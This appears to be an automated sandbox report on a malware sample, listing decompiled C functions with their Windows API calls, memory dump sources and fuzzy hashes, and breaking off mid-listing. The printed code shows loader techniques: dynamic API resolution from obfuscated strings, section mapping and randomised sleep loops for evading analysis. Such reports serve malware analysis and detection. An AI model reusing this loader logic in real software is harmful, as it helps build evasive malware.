                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00401f3b
                                                                                                                                                                                                                                                            0x00401f36
                                                                                                                                                                                                                                                            0x00401eff
                                                                                                                                                                                                                                                            0x00401ed2
                                                                                                                                                                                                                                                            0x00401f98

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • InterlockedIncrement.KERNEL32(00404108), ref: 00401EDD
                                                                                                                                                                                                                                                            • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 00401EF2
                                                                                                                                                                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,00401DB8,00000000,00000000,?), ref: 00401F29
                                                                                                                                                                                                                                                            • InterlockedDecrement.KERNEL32(00404108), ref: 00401F49
                                                                                                                                                                                                                                                            • SleepEx.KERNEL32(00000064,00000001), ref: 00401F63
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32 ref: 00401F7F
                                                                                                                                                                                                                                                            • HeapDestroy.KERNEL32 ref: 00401F8B
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1036254659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1036280390.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CreateHeapInterlocked$CloseDecrementDestroyHandleIncrementSleepThread
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3416589138-0
                                                                                                                                                                                                                                                            • Opcode ID: 6cd86b023b107bd4cddf8d35aa844711f57a351ebd9f8fbbaee5a4901ffc2d98
                                                                                                                                                                                                                                                            • Instruction ID: 41d2c79e8106bfee1acf700a83a472c495dc540afda7f6d92c5f2225a4c18c2d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6cd86b023b107bd4cddf8d35aa844711f57a351ebd9f8fbbaee5a4901ffc2d98
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3521F6B1604206AFC710AF68DD88E2A7BBCFBE1765710813AF504F62B0D7788E408B5C
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 0487A768
                                                                                                                                                                                                                                                            • IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,?), ref: 0487A7EA
                                                                                                                                                                                                                                                            • StrStrIW.SHLWAPI(?,006E0069), ref: 0487A829
                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 0487A84B
                                                                                                                                                                                                                                                              • Part of subcall function 04871565: SysAllocString.OLEAUT32(0487C2A8), ref: 048715B5
                                                                                                                                                                                                                                                            • SafeArrayDestroy.OLEAUT32(?), ref: 0487A89F
                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 0487A8AD
                                                                                                                                                                                                                                                              • Part of subcall function 0487A1A2: Sleep.KERNELBASE(000001F4), ref: 0487A1EA
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2118684380-0
                                                                                                                                                                                                                                                            • Opcode ID: 80f21024be3d91ec554fdaa9f94614289f063ff3fd8bdee68362175939f65bf8
                                                                                                                                                                                                                                                            • Instruction ID: 3c6046c6c199afdba2842e2f24fb9aeba1f4c2a71684804e42632b1175bd6ae5
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 80f21024be3d91ec554fdaa9f94614289f063ff3fd8bdee68362175939f65bf8
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A1516172900209EFDB05DFE8C8988AEB7B6FF88350B148D68E505EB210D775ED46DB51
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                            			E004016C0(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t35;
                                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t38;
                                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t41;
                                                                                                                                                                                                                                                            				intOrPtr _t44;
                                                                                                                                                                                                                                                            				struct HINSTANCE__* _t48;
                                                                                                                                                                                                                                                            				intOrPtr _t54;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t54 = E004017A6(0x20);
                                                                                                                                                                                                                                                            				if(_t54 == 0) {
                                                                                                                                                                                                                                                            					_v8 = 8;
                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                            					_t48 = GetModuleHandleA( *0x404150 + 0x405014);
                                                                                                                                                                                                                                                            					_v8 = 0x7f;
                                                                                                                                                                                                                                                            					_t28 = GetProcAddress(_t48,  *0x404150 + 0x405151);
                                                                                                                                                                                                                                                            					 *(_t54 + 0xc) = _t28;
                                                                                                                                                                                                                                                            					if(_t28 == 0) {
                                                                                                                                                                                                                                                            						L8:
                                                                                                                                                                                                                                                            						E00401590(_t54);
                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                            						_t32 = GetProcAddress(_t48,  *0x404150 + 0x405161);
                                                                                                                                                                                                                                                            						 *(_t54 + 0x10) = _t32;
                                                                                                                                                                                                                                                            						if(_t32 == 0) {
                                                                                                                                                                                                                                                            							goto L8;
                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                            							_t35 = GetProcAddress(_t48,  *0x404150 + 0x405174);
                                                                                                                                                                                                                                                            							 *(_t54 + 0x14) = _t35;
                                                                                                                                                                                                                                                            							if(_t35 == 0) {
                                                                                                                                                                                                                                                            								goto L8;
                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                            								_t38 = GetProcAddress(_t48,  *0x404150 + 0x405189);
                                                                                                                                                                                                                                                            								 *(_t54 + 0x18) = _t38;
                                                                                                                                                                                                                                                            								if(_t38 == 0) {
                                                                                                                                                                                                                                                            									goto L8;
                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                            									_t41 = GetProcAddress(_t48,  *0x404150 + 0x40519f);
                                                                                                                                                                                                                                                            									 *(_t54 + 0x1c) = _t41;
                                                                                                                                                                                                                                                            									if(_t41 == 0) {
                                                                                                                                                                                                                                                            										goto L8;
                                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                                            										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                                                                                                                                                                                                                                            										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                                                                                                                                                                                                                                            										_t44 = E004014E8(_t54, _a8); // executed
                                                                                                                                                                                                                                                            										_v8 = _t44;
                                                                                                                                                                                                                                                            										if(_t44 != 0) {
                                                                                                                                                                                                                                                            											goto L8;
                                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                                            											 *_a12 = _t54;
                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				return _v8;
                                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                                            0x004016cf
                                                                                                                                                                                                                                                            0x004016d3
                                                                                                                                                                                                                                                            0x00401795
                                                                                                                                                                                                                                                            0x004016d9
                                                                                                                                                                                                                                                            0x004016f1
                                                                                                                                                                                                                                                            0x00401700
                                                                                                                                                                                                                                                            0x00401707
                                                                                                                                                                                                                                                            0x0040170b
                                                                                                                                                                                                                                                            0x0040170e
                                                                                                                                                                                                                                                            0x0040178d
                                                                                                                                                                                                                                                            0x0040178e
                                                                                                                                                                                                                                                            0x00401710
                                                                                                                                                                                                                                                            0x0040171d
                                                                                                                                                                                                                                                            0x00401721
                                                                                                                                                                                                                                                            0x00401724
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00401726
                                                                                                                                                                                                                                                            0x00401733
                                                                                                                                                                                                                                                            0x00401737
                                                                                                                                                                                                                                                            0x0040173a
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0040173c
                                                                                                                                                                                                                                                            0x00401749
                                                                                                                                                                                                                                                            0x0040174d
                                                                                                                                                                                                                                                            0x00401750
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00401752
                                                                                                                                                                                                                                                            0x0040175f
                                                                                                                                                                                                                                                            0x00401763
                                                                                                                                                                                                                                                            0x00401766
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00401768
                                                                                                                                                                                                                                                            0x0040176e
                                                                                                                                                                                                                                                            0x00401773
                                                                                                                                                                                                                                                            0x0040177a
                                                                                                                                                                                                                                                            0x00401781
                                                                                                                                                                                                                                                            0x00401784
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00401786
                                                                                                                                                                                                                                                            0x00401789
                                                                                                                                                                                                                                                            0x00401789
                                                                                                                                                                                                                                                            0x00401784
                                                                                                                                                                                                                                                            0x00401766
                                                                                                                                                                                                                                                            0x00401750
                                                                                                                                                                                                                                                            0x0040173a
                                                                                                                                                                                                                                                            0x00401724
                                                                                                                                                                                                                                                            0x0040170e
                                                                                                                                                                                                                                                            0x004017a3

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 004017A6: HeapAlloc.KERNEL32(00000000,?,0040128A,00000208,?,00000000,?,?,?,0040106A,?), ref: 004017B2
                                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(?,00000020), ref: 004016E5
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00401707
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0040171D
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00401733
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00401749
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0040175F
                                                                                                                                                                                                                                                              • Part of subcall function 004014E8: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000), ref: 00401545
                                                                                                                                                                                                                                                              • Part of subcall function 004014E8: memset.NTDLL ref: 00401567
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1036254659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1036280390.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1632424568-0
                                                                                                                                                                                                                                                            • Opcode ID: 6fd63521911bc2f9e7b4c0b3f53499c0974ffe8d01ddafd61617f0cdfb7d4aa2
                                                                                                                                                                                                                                                            • Instruction ID: 2c15e4761c7f2704307de655c06eedc2938b6695816a5cd2b142841935777ca6
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6fd63521911bc2f9e7b4c0b3f53499c0974ffe8d01ddafd61617f0cdfb7d4aa2
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5E214FB5500606EFD720EFA9DD48E677BECEF483407004576E915EB3A1E634E9058BA8
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 74%
                                                                                                                                                                                                                                                            			E04879A11(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                                            				struct _FILETIME _v12;
                                                                                                                                                                                                                                                            				void* _t10;
                                                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                                                            				int _t14;
                                                                                                                                                                                                                                                            				signed int _t16;
                                                                                                                                                                                                                                                            				void* _t18;
                                                                                                                                                                                                                                                            				signed int _t19;
                                                                                                                                                                                                                                                            				unsigned int _t23;
                                                                                                                                                                                                                                                            				void* _t26;
                                                                                                                                                                                                                                                            				signed int _t33;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t26 = __edx;
                                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                                            				_t10 = HeapCreate(0, 0x400000, 0); // executed
                                                                                                                                                                                                                                                            				 *0x487d238 = _t10;
                                                                                                                                                                                                                                                            				if(_t10 != 0) {
                                                                                                                                                                                                                                                            					 *0x487d1a8 = GetTickCount();
                                                                                                                                                                                                                                                            					_t12 = E048741C2(_a4);
                                                                                                                                                                                                                                                            					if(_t12 == 0) {
                                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                                            							GetSystemTimeAsFileTime( &_v12);
                                                                                                                                                                                                                                                            							_t14 = SwitchToThread();
                                                                                                                                                                                                                                                            							_t23 = _v12.dwHighDateTime;
                                                                                                                                                                                                                                                            							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 7;
                                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                                            							_push(9);
                                                                                                                                                                                                                                                            							_push(_t23 >> 7);
                                                                                                                                                                                                                                                            							_push(_t16);
                                                                                                                                                                                                                                                            							L0487B1D6();
                                                                                                                                                                                                                                                            							_t33 = _t14 + _t16;
                                                                                                                                                                                                                                                            							_t18 = E04871430(_a4, _t33);
                                                                                                                                                                                                                                                            							_t19 = 2;
                                                                                                                                                                                                                                                            							_t25 = _t33;
                                                                                                                                                                                                                                                            							Sleep(_t19 << _t33); // executed
                                                                                                                                                                                                                                                            						} while (_t18 == 1);
                                                                                                                                                                                                                                                            						if(E0487701E(_t25) != 0) {
                                                                                                                                                                                                                                                            							 *0x487d260 = 1; // executed
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						_t12 = E04879016(_t26); // executed
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                            					_t12 = 8;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				return _t12;
                                                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                                                            0x04879a11
                                                                                                                                                                                                                                                            0x04879a17
                                                                                                                                                                                                                                                            0x04879a18
                                                                                                                                                                                                                                                            0x04879a24
                                                                                                                                                                                                                                                            0x04879a2c
                                                                                                                                                                                                                                                            0x04879a31
                                                                                                                                                                                                                                                            0x04879a41
                                                                                                                                                                                                                                                            0x04879a46
                                                                                                                                                                                                                                                            0x04879a4d
                                                                                                                                                                                                                                                            0x04879a4f
                                                                                                                                                                                                                                                            0x04879a54
                                                                                                                                                                                                                                                            0x04879a5a
                                                                                                                                                                                                                                                            0x04879a60
                                                                                                                                                                                                                                                            0x04879a6a
                                                                                                                                                                                                                                                            0x04879a6e
                                                                                                                                                                                                                                                            0x04879a70
                                                                                                                                                                                                                                                            0x04879a75
                                                                                                                                                                                                                                                            0x04879a76
                                                                                                                                                                                                                                                            0x04879a77
                                                                                                                                                                                                                                                            0x04879a7c
                                                                                                                                                                                                                                                            0x04879a82
                                                                                                                                                                                                                                                            0x04879a8b
                                                                                                                                                                                                                                                            0x04879a8c
                                                                                                                                                                                                                                                            0x04879a91
                                                                                                                                                                                                                                                            0x04879a97
                                                                                                                                                                                                                                                            0x04879aa3
                                                                                                                                                                                                                                                            0x04879aa5
                                                                                                                                                                                                                                                            0x04879aa5
                                                                                                                                                                                                                                                            0x04879aaf
                                                                                                                                                                                                                                                            0x04879aaf
                                                                                                                                                                                                                                                            0x04879a33
                                                                                                                                                                                                                                                            0x04879a35
                                                                                                                                                                                                                                                            0x04879a35
                                                                                                                                                                                                                                                            0x04879ab9

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,04877E84,?), ref: 04879A24
                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 04879A38
                                                                                                                                                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,04877E84,?), ref: 04879A54
                                                                                                                                                                                                                                                            • SwitchToThread.KERNEL32(?,00000001,?,?,?,04877E84,?), ref: 04879A5A
                                                                                                                                                                                                                                                            • _aullrem.NTDLL(?,?,00000009,00000000), ref: 04879A77
                                                                                                                                                                                                                                                            • Sleep.KERNELBASE(00000002,00000000,?,00000001,?,?,?,04877E84,?), ref: 04879A91
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 507476733-0
                                                                                                                                                                                                                                                            • Opcode ID: a8344e9c513ec3ac91f4eacdc13fcfde3a3f20bdabb48242c2ed74de7943b9e3
                                                                                                                                                                                                                                                            • Instruction ID: 0cfd1a7462d1786d2c62a931288d68418d4e8f06760862429263932e7fa223f9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a8344e9c513ec3ac91f4eacdc13fcfde3a3f20bdabb48242c2ed74de7943b9e3
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E1186B2A542046FF710BB68DC2EB5A77D8EB44795F000F19F949D7180EAB4F88097A5
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 57%
                                                                                                                                                                                                                                                            			E04879016(signed int __edx) {
                                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                                            				long _v12;
                                                                                                                                                                                                                                                            				CHAR* _v16;
                                                                                                                                                                                                                                                            				long _v20;
                                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                                                            				CHAR* _t22;
                                                                                                                                                                                                                                                            				CHAR* _t25;
                                                                                                                                                                                                                                                            				intOrPtr _t26;
                                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                                            				void* _t31;
                                                                                                                                                                                                                                                            				void* _t32;
                                                                                                                                                                                                                                                            				CHAR* _t36;
                                                                                                                                                                                                                                                            				CHAR* _t42;
                                                                                                                                                                                                                                                            				CHAR* _t43;
                                                                                                                                                                                                                                                            				CHAR* _t44;
                                                                                                                                                                                                                                                            				CHAR* _t46;
                                                                                                                                                                                                                                                            				void* _t49;
                                                                                                                                                                                                                                                            				void* _t51;
                                                                                                                                                                                                                                                            				CHAR* _t54;
                                                                                                                                                                                                                                                            				signed char _t56;
                                                                                                                                                                                                                                                            				intOrPtr _t58;
                                                                                                                                                                                                                                                            				signed int _t59;
                                                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                                                            				CHAR* _t65;
                                                                                                                                                                                                                                                            				CHAR* _t66;
                                                                                                                                                                                                                                                            				char* _t67;
                                                                                                                                                                                                                                                            				void* _t68;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t61 = __edx;
                                                                                                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                            				_v12 = 0;
                                                                                                                                                                                                                                                            				_t21 = E04874781();
                                                                                                                                                                                                                                                            				if(_t21 != 0) {
                                                                                                                                                                                                                                                            					_t59 =  *0x487d25c; // 0x4000000a
                                                                                                                                                                                                                                                            					_t55 = (_t59 & 0xf0000000) + _t21;
                                                                                                                                                                                                                                                            					 *0x487d25c = (_t59 & 0xf0000000) + _t21;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_t22 =  *0x487d164(0, 2);
                                                                                                                                                                                                                                                            				_v16 = _t22;
                                                                                                                                                                                                                                                            				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                                                                                                                                                                                                                                                            					_t25 = E048742E2( &_v8,  &_v20); // executed
                                                                                                                                                                                                                                                            					_t54 = _t25;
                                                                                                                                                                                                                                                            					_t26 =  *0x487d27c; // 0x9da5a8
                                                                                                                                                                                                                                                            					if( *0x487d25c > 5) {
                                                                                                                                                                                                                                                            						_t8 = _t26 + 0x487e5cd; // 0x4d283a53
                                                                                                                                                                                                                                                            						_t27 = _t8;
                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                            						_t7 = _t26 + 0x487ea15; // 0x44283a44
                                                                                                                                                                                                                                                            						_t27 = _t7;
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					E04877EA6(_t27, _t27);
                                                                                                                                                                                                                                                            					_t31 = E04877F89(_t61,  &_v20,  &_v12); // executed
                                                                                                                                                                                                                                                            					if(_t31 == 0) {
                                                                                                                                                                                                                                                            						CloseHandle(_v20);
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					_t62 = 5;
                                                                                                                                                                                                                                                            					if(_t54 != _t62) {
                                                                                                                                                                                                                                                            						 *0x487d270 =  *0x487d270 ^ 0x81bbe65d;
                                                                                                                                                                                                                                                            						_t32 = E048716F8(0x60);
                                                                                                                                                                                                                                                            						__eflags = _t32;
                                                                                                                                                                                                                                                            						 *0x487d324 = _t32;
                                                                                                                                                                                                                                                            						if(_t32 == 0) {
                                                                                                                                                                                                                                                            							_push(8);
                                                                                                                                                                                                                                                            							_pop(0);
                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                            							memset(_t32, 0, 0x60);
                                                                                                                                                                                                                                                            							_t49 =  *0x487d324; // 0x52595b0
                                                                                                                                                                                                                                                            							_t68 = _t68 + 0xc;
                                                                                                                                                                                                                                                            							__imp__(_t49 + 0x40);
                                                                                                                                                                                                                                                            							_t51 =  *0x487d324; // 0x52595b0
                                                                                                                                                                                                                                                            							 *_t51 = 0x487e836;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						__eflags = 0;
                                                                                                                                                                                                                                                            						_t54 = 0;
                                                                                                                                                                                                                                                            						if(0 == 0) {
                                                                                                                                                                                                                                                            							_t36 = RtlAllocateHeap( *0x487d238, 0, 0x43);
                                                                                                                                                                                                                                                            							__eflags = _t36;
                                                                                                                                                                                                                                                            							 *0x487d2c0 = _t36;
                                                                                                                                                                                                                                                            							if(_t36 == 0) {
                                                                                                                                                                                                                                                            								_push(8);
                                                                                                                                                                                                                                                            								_pop(0);
                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                            								_t56 =  *0x487d25c; // 0x4000000a
                                                                                                                                                                                                                                                            								_t61 = _t56 & 0x000000ff;
                                                                                                                                                                                                                                                            								_t58 =  *0x487d27c; // 0x9da5a8
                                                                                                                                                                                                                                                            								_t13 = _t58 + 0x487e55a; // 0x697a6f4d
                                                                                                                                                                                                                                                            								_t55 = _t13;
                                                                                                                                                                                                                                                            								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x487c29f);
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            							__eflags = 0;
                                                                                                                                                                                                                                                            							_t54 = 0;
                                                                                                                                                                                                                                                            							if(0 == 0) {
                                                                                                                                                                                                                                                            								asm("sbb eax, eax");
                                                                                                                                                                                                                                                            								E0487A446( ~_v8 &  *0x487d270, 0x487d00c); // executed
                                                                                                                                                                                                                                                            								_t42 = E048723FC(_t55); // executed
                                                                                                                                                                                                                                                            								_t54 = _t42;
                                                                                                                                                                                                                                                            								__eflags = _t54;
                                                                                                                                                                                                                                                            								if(_t54 != 0) {
                                                                                                                                                                                                                                                            									goto L30;
                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                            								_t43 = E04877DF1(_t55); // executed
                                                                                                                                                                                                                                                            								__eflags = _t43;
                                                                                                                                                                                                                                                            								if(_t43 != 0) {
                                                                                                                                                                                                                                                            									__eflags = _v8;
                                                                                                                                                                                                                                                            									_t65 = _v12;
                                                                                                                                                                                                                                                            									if(_v8 != 0) {
                                                                                                                                                                                                                                                            										L29:
                                                                                                                                                                                                                                                            										_t44 = E048786DE(_t61, _t65, _v8); // executed
                                                                                                                                                                                                                                                            										_t54 = _t44;
                                                                                                                                                                                                                                                            										goto L30;
                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                            									__eflags = _t65;
                                                                                                                                                                                                                                                            									if(__eflags == 0) {
                                                                                                                                                                                                                                                            										goto L30;
                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                            									_t46 = E04872055(__eflags,  &(_t65[4])); // executed
                                                                                                                                                                                                                                                            									_t54 = _t46;
                                                                                                                                                                                                                                                            									__eflags = _t54;
                                                                                                                                                                                                                                                            									if(_t54 == 0) {
                                                                                                                                                                                                                                                            										goto L30;
                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                            									goto L29;
                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                            								_t54 = 8;
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                            						_t66 = _v12;
                                                                                                                                                                                                                                                            						if(_t66 == 0) {
                                                                                                                                                                                                                                                            							L30:
                                                                                                                                                                                                                                                            							if(_v16 == 0 || _v16 == 1) {
                                                                                                                                                                                                                                                            								 *0x487d160();
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            							goto L34;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						_t67 =  &(_t66[4]);
                                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                                            						} while (E04876C7E(_t62, _t67, 0, 1) == 0x4c7);
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					goto L30;
                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                            					_t54 = _t22;
                                                                                                                                                                                                                                                            					L34:
                                                                                                                                                                                                                                                            					return _t54;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            			}
































                                                                                                                                                                                                                                                            0x04879016
                                                                                                                                                                                                                                                            0x04879021
                                                                                                                                                                                                                                                            0x04879024
                                                                                                                                                                                                                                                            0x04879027
                                                                                                                                                                                                                                                            0x0487902a
                                                                                                                                                                                                                                                            0x04879031
                                                                                                                                                                                                                                                            0x04879033
                                                                                                                                                                                                                                                            0x0487903f
                                                                                                                                                                                                                                                            0x04879041
                                                                                                                                                                                                                                                            0x04879041
                                                                                                                                                                                                                                                            0x0487904a
                                                                                                                                                                                                                                                            0x04879052
                                                                                                                                                                                                                                                            0x04879055
                                                                                                                                                                                                                                                            0x0487906f
                                                                                                                                                                                                                                                            0x0487907b
                                                                                                                                                                                                                                                            0x0487907d
                                                                                                                                                                                                                                                            0x04879082
                                                                                                                                                                                                                                                            0x0487908c
                                                                                                                                                                                                                                                            0x0487908c
                                                                                                                                                                                                                                                            0x04879084
                                                                                                                                                                                                                                                            0x04879084
                                                                                                                                                                                                                                                            0x04879084
                                                                                                                                                                                                                                                            0x04879084
                                                                                                                                                                                                                                                            0x04879093
                                                                                                                                                                                                                                                            0x048790a0
                                                                                                                                                                                                                                                            0x048790a7
                                                                                                                                                                                                                                                            0x048790ac
                                                                                                                                                                                                                                                            0x048790ac
                                                                                                                                                                                                                                                            0x048790b4
                                                                                                                                                                                                                                                            0x048790b7
                                                                                                                                                                                                                                                            0x048790dd
                                                                                                                                                                                                                                                            0x048790e9
                                                                                                                                                                                                                                                            0x048790ee
                                                                                                                                                                                                                                                            0x048790f0
                                                                                                                                                                                                                                                            0x048790f5
                                                                                                                                                                                                                                                            0x04879121
                                                                                                                                                                                                                                                            0x04879123
                                                                                                                                                                                                                                                            0x048790f7
                                                                                                                                                                                                                                                            0x048790fb
                                                                                                                                                                                                                                                            0x04879100
                                                                                                                                                                                                                                                            0x04879105
